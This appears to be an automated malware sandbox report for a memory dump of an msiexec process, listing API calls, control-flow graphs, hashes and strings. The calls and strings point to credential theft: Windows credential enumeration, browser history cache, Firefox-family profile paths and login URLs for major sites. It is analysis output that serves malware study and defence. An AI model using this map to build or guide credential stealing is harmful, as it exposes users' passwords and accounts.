                                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                            • String ID: visited:
                                                                                                            • API String ID: 1157525455-1702587658
                                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                            • API String ID: 2804212203-2982631422
                                                                                                            • Opcode ID: 011f1ee4c8a676e7993d49e178f6fd90f7880661b1005521c0cb7dff8e01015d
                                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                            • Opcode Fuzzy Hash: 011f1ee4c8a676e7993d49e178f6fd90f7880661b1005521c0cb7dff8e01015d
                                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 115830560-3916222277
                                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                            • API String ID: 2936932814-4196376884
                                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 697348961-0
                                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                                            • API String ID: 1829478387-11920434
                                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                                            • memset.MSVCRT ref: 00403E8F
                                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                            • API String ID: 1829478387-2068335096
                                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                                            • memset.MSVCRT ref: 00404020
                                                                                                            • memset.MSVCRT ref: 00404035
                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                            • API String ID: 1829478387-3369679110
                                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                            • API String ID: 3510742995-2641926074
                                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                                            • free.MSVCRT ref: 0041848B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileLastfree
                                                                                                            • String ID: |A
                                                                                                            • API String ID: 981974120-1717621600
                                                                                                            • Opcode ID: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                            • Opcode Fuzzy Hash: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                            • String ID: $0.@
                                                                                                            • API String ID: 2758756878-1896041820
                                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2941347001-0
                                                                                                            • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                            • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcscat$wcscpywcslen
                                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                            • API String ID: 2489821370-1174173950
                                                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                            • String ID:
